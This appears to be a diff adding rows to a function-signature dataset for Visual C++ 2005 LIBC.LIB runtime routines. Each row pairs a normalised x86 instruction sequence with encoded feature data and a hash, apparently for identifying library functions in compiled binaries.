+__ffexpm1,"FLD ST\nFRNDINT\nFTST\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nWAIT\nMOV R8,BYTE PTR SS:[EBP+CONST]\nFXCH ST(1)",YFJggZdxUZ4qs0LeKrNC3gGhdbMAAAAAAaF1swAAAAAAAAAAMkfmRAAAAAAAAAAA7EjSc2BSYIEyR+ZEl3FRngGhdbMAAAAA,[],faf4ca39627caff07ebef7c57cef500a872b2982,VS2005,LIBC.LIB
+__fFLN,"FLDLN2\nFXCH ST(1)\nFTST\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nWAIT\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",7ncY0wAAAAAAAAAAAaF1swAAAAAAAAAANRZyEwGhdbMAAAAATleniKJUKRnudxjTolQpGQGhdbM1FnIT,[],3bb1480abd0e93745ac1cf07901b23aead9ec424,VS2005,LIBC.LIB
+__rtinfnpopse,"FSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",veFwVwAAAAAAAAAA,[],0846fe7a8bb3c61a236429a8c7df553519d482bc,VS2005,LIBC.LIB
+__rtinfnpop,"FSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",veFwVwAAAAAAAAAA,[],0ddd42c6c20de7711cd6d83a1d8abaa5d9fa136c,VS2005,LIBC.LIB
+__rtinfpopse,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",beiRdwAAAAAAAAAA,[],243b9a8705092e469cffdcfe58ba512aca3e6b12,VS2005,LIBC.LIB
+__ismbclegal,"MOV R32,DWORD PTR SS:[ESP+CONST]\nSHR R32,CONST\nMOVZX R32,R8\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",7RxXy1LONpUrUQyRUg74tAAAAAAAAAAAK1EMkVLONpVSDvi0Us42lQAAAAAAAAAA,[],9fd602590d02094293185a14d7f26e2f7e6acb53,VS2005,LIBC.LIB
+_mainCRTStartup,"PUSH CONST\nCALL CONST\nPOP R32\nAND DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nCALL CONST",vzk5iwAAAAAAAAAAlBvbJitmRxu/OTmLK2ZHGwAAAAAAAAAA,[],290f7be91b9f7ee770a9b422c0020da7e6a03c22,VS2005,LIBC.LIB
+__input,"INC DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nMOVZX R32,BYTE PTR DS:[R32]\nINC R32\nCMP R32,R32",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,[],9a233b314167dd8228598aea27c011e257637e58,VS2005,LIBC.LIB
+__mbsnbcoll,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",cMiU5PHtIWZPi8wKT4vMCgAAAAAAAAAAwrxAVgAAAAAAAAAAMXhCcAAAAAAAAAAA8e0hZsK8QFYxeEJw,[],e9eccaadce6b1fd5e1a36e6a122702fe665d9a1d,VS2005,LIBC.LIB
+__vsnprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nMOV R32,R32\nPOP R32",0mrXVCaaaqQ3XfGVN13xleudzdcAAAAA653N1wAAAAAAAAAAJppqpAAAAAAAAAAA,[],d95e54c92c69d46bf78ab438ecb57122bcfc975b,VS2005,LIBC.LIB
+__wexeclpe,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",I+RHO6Foj01748YLe+PGC3vjxguhaI9NoWiPTQAAAAAAAAAA,[],75f8a7a63e66d35b0d7e31175aebe85a7cd9df8a,VS2005,LIBC.LIB
+_wcstombs,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nPOP R32\nMOV R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",DczAAUL41tYAAAAAJAPDnRcgTwJy6DpFFaIxVr3y74Rztzs1etHCt0L41tYAAAAATmrDzmOmfIR60cK3c7c7NUL41tYAAAAAncZqFmOmfIROasPOTmrDzmOmfIT3oyjMcug6RWeYeLidxmoWvfLvhGOmfIS7IZT296MozGOmfITfE8DlZ5h4uGOmfIROasPOj//PrGOmfIQXqJ4tfyXqfRWiMVYuVbn+3xPA5Q3MwAEygx5ZMoMeWWOmfIS7IZT2uyGU9mOmfITo/oHQ6P6B0EL41tYAAAAALlW5/hWiMVZmeTE1Y6Z8hEL41tYAAAAATmrDzmOmfISFLIQxZnkxNUL41tYAAAAAhSyEMUL41tY1FnITQvjW1gAAAAAAAAAAuyGU9mOmfISpAMUzcug6RWZ5MTWP/8+sNRZyE+j+gdAAAAAAqQDFMw3MwAHkUryfFaIxViQDw51y6DpFFyBPAk5qw85OasPOOqA1JGOmfIQXqJ4t5FK8n+Oiq3xVjZ7LVY2eyw3MwAEzPj6BF6ieLWZ5MTUHtjOmMz4+gVWNnsvjoqt8B7YzpjqgNSRmeTE146KrfN8TwOUAAAAAZnkxNUL41tYAAAAA,[],4b1f4a873c7e42b632edf630bf06f04969d68b93,VS2005,LIBC.LIB
+_getc,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,YmbX/AAAAAAAAAAAu8PygmJm1/ybMULvmzFC7wAAAAAAAAAA,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+_fgetc,"MOV R32,DWORD PTR DS:[R32]\nMOVZX R32,BYTE PTR DS:[R32]\nINC R32\nMOV DWORD PTR DS:[R32],R32\nRETN",YmbX/AAAAAAAAAAAu8PygmJm1/ybMULvmzFC7wAAAAAAAAAA,[],bd48c8b438699992224c616b06e4dcec6d52f59a,VS2005,LIBC.LIB
+__ftbuf,"PUSH R32\nCALL CONST\nAND BYTE PTR DS:[R32+CONST],CONST\nAND DWORD PTR DS:[R32+CONST],0\nAND DWORD PTR DS:[R32],0\nAND DWORD PTR DS:[R32+CONST],0\nPOP R32\nPOP R32",hI42PgAAAAAAAAAAIJh/sgAAAAAAAAAAAOHWawAAAAAAAAAA4ucjmkPfR3VD30d1Q99HdQDh1muEjjY+Q99HdQDh1msgmH+y,[],4b20b2340d5d1319c80355bf28038cdfc063154d,VS2005,LIBC.LIB
+__stbuf,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",+y3xuG1kpmJeToBoDczAASh59rYAAAAA9pxlVEco7JwAAAAARyjsnAAAAAAAAAAAWNooOk+LzAr1QnMbR7G+cE+LzApY2ig6KHn2tk+LzAr7LfG49UJzG0+LzAr7LfG4T4vMCgAAAAAAAAAAXk6AaG1kpmL2nGVUbWSmYkco7JwAAAAAWNooOljaKDoNzMAB,[],52a71ef6c022b8e0aa1fc848432c6f8fd5d0e8a3,VS2005,LIBC.LIB
+__putch,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R8,BYTE PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[0],-2\nMOV BYTE PTR SS:[EBP+CONST],R8\nJCC CONST",kmXvESnAI9C+ZeaDgvcbCSnAI9C+ZeaD+nkW8QAAAAAAAAAAKcAj0AAAAAAAAAAAvEsSC4L3GwmSZe8RvmXmgynAI9D6eRbx,[],bacd26b87efd9e41e2d0304312663041bf9315e6,VS2005,LIBC.LIB
+__allmul,"PUSH R32\nMUL R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL R32",lO+zQK27ITBd7RnUrbshMAAAAAAAAAAAXe0Z1AAAAAAAAAAA,[],9fcbc10ac0e186150c3bdef2215147fc39332cc2,VS2005,LIBC.LIB
+_putwchar,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,oP5JkAAAAAAAAAAA,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+__fputwchar,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAA,g/KBGf6jj8gAAAAAnIZROGYLpgVnTHFqZ0xxaj/DesUAAAAA/qOPyD/DesUAAAAAu7ZcLN8TwOXfE8DlZgumBT/DesUAAAAA3xPA5RJYlpjPUa13z1GtdwbJvNEAAAAAP8N6xQAAAAAAAAAABsm80bu2XCwAAAAAEliWmD4tmf4AAAAAPi2Z/ru2XCwAAAAAV/duOZyGUTjnC9+Xu7ZcLP6jj8iWfJuvlnybrz/DesUAAAAA5wvflyqzQt73825o3xPA5Uw8INwvUP9ML1D/TLu2XCwAAAAA9/NuaNJEIioAAAAATDwg3P6jj8jfE8DlKrNC3tJEIioAAAAA0kQiKpyGUTg6THsMu7ZcLP6jj8jfE8Dl3xPA5ciUmvi/v5nTOkx7DLu2XCyD8oEZv7+Z0wbJvNEAAAAAyJSa+D4tmf4AAAAA,e44cca1bb68e56c2fe62568c02fed55683e04116,VS2005,LIBC.LIB
+__cprintf,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN",NQ7aigAAAAAAAAAA,pCOLq05qw84AAAAAc6IZYQAAAAAAAAAAW9AV4Cbu4WVb0BXgW9AV4Cbu4WUNvp3QSrlHpk5qw84AAAAAh+g93SoNscxINCO7Kg2xzEq5R6ZzohlhSDQjuwAAAAAAAAAADb6d0IfoPd0AAAAATmrDznOiGWFb0BXgJu7hZYfoPd0AAAAAFjS8x3OiGWGkI4ur,d39ac6c497fda8a05bf277df01157198633e4edf,VS2005,LIBC.LIB
+___crtLCMapStringW,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[0]\nCMP R32,CONST",Kw/CjCbu4WUnD3USIKRRfybu4WXjVnKrkUvYnSbu4WUvCfKA5w5V5eKh3IcAAAAA1ZSAXSbu4WWQFT6nJw91ErshlPYuVbn+VBzX7SCkUX9qhssSTv0LFCbu4WW7IZT2LlW5/g3MwAFy6DpFcug6RUFybfsm7uFluyGU9q3PB3fVlIBdJu7hZUFybfsAAAAALwnygCbu4WVIGAbfQXJt+w3MwAEAAAAArc8Hdybu4WWQFT6naobLErshlPYAAAAAuyGU9vHP1sR1O0xhdTtMYVA6F5QAAAAA8c/WxFA6F5QAAAAAUDoXlCbu4WUNzMABSBgG33LoOkUAAAAAkBU+p9XCWSEAAAAA41Zyq4L3GwnFhoGeDczAAeKh3IcAAAAAJu7hZeKh3IcAAAAAuyGU9oL3GwnFhoGe4qHchwAAAAAAAAAAxYaBnk79CxTnDlXlGO/vFrshlPZUHNftgvcbCU79CxTnDlXl1cJZISbu4WWRS9idcug6RSbu4WUrD8KM,[],ba6a27819e91ae2980ef38b780279a8d3c9225d6,VS2005,LIBC.LIB
+__lseeki64,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST\nMOV R32,DWORD PTR DS:[R32]\nTEST BYTE PTR DS:[R32+R32+CONST],CONST",GaZm/76SvBMAAAAALokCbgAAAAAAAAAAy7YZnaCxDgc9ZCFohnY7576SvBMAAAAA8jwvCoZ2O+cuBZSig3Vl6aCxDgfLthmdPWQhaL6SvBMAAAAAgJBg3oZ2O+fyPC8KLgWUooN1ZekZpmb/oLEOBy6JAm4AAAAAvpK8Ey6JAm4AAAAA,[],c71a7ed8679bd0a9659470a9bd16599a154a2a70,VS2005,LIBC.LIB
+_clock,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL DWORD PTR DS:[0]",wdoKjwAAAAAAAAAA,[],e793eaecd470a1c047ac3cc13a5d4927295f2cd2,VS2005,LIBC.LIB
+___inittime,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL DWORD PTR DS:[0]",L1trSQAAAAAAAAAA,[],f5b23203da7068ecafc975ef6b33d64d26f93f99,VS2005,LIBC.LIB
+__getdllprocaddr,PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN,iw0UTE+LzAqSL+/sT4vMCgAAAAAAAAAAWPfYSQAAAAAAAAAAki/v7Fj32EkAAAAAnIZROE+LzAr+LIfz/iyH8wAAAAAAAAAAcMiU5JyGUTiLDRRM,[],084c31bb095b045067e8bb074ed46352d49ba745,VS2005,LIBC.LIB
+_strtok,"MOV R8,BYTE PTR DS:[R32]\nPUSH CONST\nMOVZX R32,R8\nMOV R32,R32\nPOP R32\nAND R32,R32\nSHL R32,R8\nSHR CONST2,CONST",LlW5/tqRKHnmG2yx6P6B0I/izv0AAAAAi+rLwovqy8IuVbn+2M0Epibu4WXo/oHQ5htssdqRKHkAAAAA6P6B0NqRKHkAAAAATF9QBovqy8IuVbn+Ju7hZY/izv0AAAAAj+LO/etivgMFzv3T62K+AwAAAAAAAAAABc7907IEozbo/oHQ2pEoeSbu4WXYzQSmsgSjNutivgMAAAAA,[],2dcf3dcaf1105ebe36be1817acdc95b6a73a2764,VS2005,LIBC.LIB
+___lconv_init,"OR R8,CONST\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8\nMOV BYTE PTR DS:[CONST],R8",hZCJdQAAAAAAAAAA,[],82719792749d438005f27c6e73606eca1579a1cf,VS2005,LIBC.LIB
+_raise,"LEA R32,DWORD PTR DS:[R32+R32*2]\nSUB R32,R32\nLEA R32,DWORD PTR DS:[R32*4+CONST]\nAND DWORD PTR DS:[R32],0\nADD R32,CONST\nDEC R32\nJCC CONST",/F/VqQYHJ7q7tlwsfMUXXBO8hmW7tlwsu7ZcLDC5eiwGBye6u7ZcLBO8hmW7tlwsu7ZcLLJkVim7tlwsBgcnujC5eixSl+6Wu7ZcLEFF0BsTvIZlu7ZcLLJkVim7tlwsE7yGZS5Vuf4BBiIKu7ZcLCPm2Bi7tlwsUpfuljC5eiwAAAAAu7ZcLCPm2BiX2nuUMLl6LDlafGAAAAAAOVp8YAAAAAAAAAAAAQYiCnLoOkUAAAAAI+bYGLu2XCwAAAAAZnkxNTlafGAAAAAA4oRyd7JkVim7tlwsI+bYGLu2XCwAAAAAQUXQG3LoOkUAAAAAcug6RS5Vuf7/vg+//74Pv67KagjEqZ8NI+bYGLu2XCwAAAAAl9p7lCPm2BivJ1dcsmRWKbu2XCwAAAAAxKmfDeunqJ1eo4MnrydXXDlafGAAAAAA66eoneunqJ1eo4MnUONty7u2XCwAAAAAXqODJ67KaggAAAAALlW5/vxf1amuymoIu7ZcLHLoOkVmeTE1rspqCAYHJ7oAAAAAcug6RXzFF1x7lms238NnVlDjbcvihHJ3e5ZrNnzFF1wAAAAA,[],190bf5b5a0c33d2a1629a7b1165ffcc043ab05d1,VS2005,LIBC.LIB
+_signal,"MOV DWORD PTR DS:[R32+CONST],R32\nMOV R32,DWORD PTR DS:[0]\nADD R32,CONST\nLEA R32,DWORD PTR DS:[R32+R32*2]\nLEA R32,DWORD PTR DS:[R32*4]\nCMP R32,R32\nJCC CONST",KAhavmOmfIRO/QsUQUXQGw3MwAEAAAAAJAPDneKEcnfwqDS7DczAATlafGAAAAAA8Kg0u+eg5sCvJ4nnTv0LFGOmfITnC9+X5wvflyQDw527tlwsryeJ594RQpS7tlwsu7ZcLIhcI+u7tlws4oRyd94RQpS7tlwsu7ZcLCQDw527tlwsu7ZcLN4RQpS7tlwsu7ZcLLu2XCy7tlwsIgjDdg3MwAFeo4Mnu7ZcLN4RQpSX2nuUu7ZcLLu2XCy7tlwsl9p7lEFF0BveEUKU3hFClA3MwAEAAAAAu7ZcLIhcI+tO/QsUTv0LFGOmfISIXCPr56DmwDlafGAAAAAAiFwj62OmfIT7NTlGY6Z8hDlafGAAAAAA+zU5Rg3MwAEiCMN2TmrDzg3MwAEiCMN2OVp8YAAAAAAAAAAA3hFClA3MwAEAAAAA3hFClA3MwAEAAAAA3hFClA3MwAEAAAAAXqODJ05qw84AAAAAu7ZcLOKEcnckA8Od,[],280cda01462cad70902ce4e97a8e96d9ecb135a8,VS2005,LIBC.LIB
+__wstrtime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32",omAEEgAAAAAAAAAA,[],c1db174022e63ae1c8f4dbe3dde05d84c9e1fc01,VS2005,LIBC.LIB
+__getdrives,JMP DWORD PTR DS:[0],fkA88AAAAAAAAAAA,[],3aefa5c151ddda10ebefb209835c6b2880c96ec2,VS2005,LIBC.LIB
+__startOneArgErrorHandling,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-20\nMOV DWORD PTR SS:[EBP+CONST],R32\nFSTP QWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]",OmU1PAAAAAAAAAAABlvRgzplNTwAAAAAl6nUKzplNTwGW9GD,[],a0b559b5d1ff514268cba90c359f808370551d7b,VS2005,LIBC.LIB
+__startTwoArgErrorHandling,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-20\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",daXt8DplNTwGW9GDkTCVaXWl7fAAAAAAOmU1PAAAAAAAAAAABlvRgzplNTwAAAAA,[],68e4a95ac7333820362f5d8b1ea7d29bebe82127,VS2005,LIBC.LIB
+__assert,"LEA R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD R32,CONST\nPOP R32\nCMP R32,CONST\nJCC CONST",TqCLsQAAAAAAAAAAu7ZcLDUWchNeo4MnljID7XntRpUAAAAAI7uKhru2XCzf16dVXqODJ06gi7EAAAAAlIu5dZYkujfFLh0+u7ZcLLu2XCw7j6vlL67pxGBTNSkAAAAAxS4dPpYkujcAAAAA2QWyf23CC3qgzGzkYFM1KUU5CeNylm0pliS6NzUWchMAAAAARUVpYtkFsn/Vs8HR+IH2g23CC3qgzGzkee1GlZOvmPEaAtwlYt3jOdkFsn/Vs8HRGgLcJXntRpWTr5jx39enVbu2XCwAAAAAoMxs5CO7ioYAAAAAk6+Y8U6gi7F3vEwxcpZtKUU5CeMAAAAAfsS7lE6gi7EAAAAANRZyE5YyA+0AAAAA0UiUpX7Eu5StkX8Cd7xMMX7Eu5Ry6DpF7IR31mLd4zlFRWlicug6Ra2RfwLRSJSlckFStSEohQTshHfWuA3jPZSLuXVy6DpFRTkJ406gi7EAAAAATqCLsQAAAAAAAAAAISiFBGLd4zlFRWlirZF/Ak6gi7ER9Xmg1bPB0fiB9oMAAAAAbcILeru2XCzf16dVcug6RXJBUrXRSJSlEfV5oGBTNSkvrunE0UiUpZSLuXVyQVK1O4+r5U6gi7EAAAAA,[],b9cf9fc038fcfcfb2a6858d1d3d43bffeff5625f,VS2005,LIBC.LIB
+_fputwc,"PUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nCMP R32,-1\nPOP R32\nJCC CONST",nIZROGYLpgVnTHFqZ0xxaj/DesUAAAAA/qOPyD/DesUAAAAAu7ZcLN8TwOXfE8DlZgumBT/DesUAAAAA3xPA5VKiZ88FLSI+Pi2Z/ru2XCwAAAAAP8N6xQAAAAAAAAAABS0iPru2XCwAAAAABsm80bu2XCwAAAAAUqJnz7u2XCwAAAAAV/duOZyGUTjnC9+Xu7ZcLP6jj8iWfJuvlnybrz/DesUAAAAA5wvflxRzrGX3825o3xPA5Uw8INwvUP9ML1D/TLu2XCwAAAAA9/NuaNJEIioAAAAATDwg3P6jj8jfE8DlFHOsZZyGUTg6THsM0kQiKpyGUTg6THsMu7ZcLP6jj8jfE8Dl3xPA5ciUmvi/v5nTOkx7DLu2XCyD8oEZv7+Z0wbJvNEAAAAAyJSa+D4tmf4AAAAAg/KBGf6jj8gAAAAA,[],77a541777e8981d17585c0a88a5693666d8a6913,VS2005,LIBC.LIB
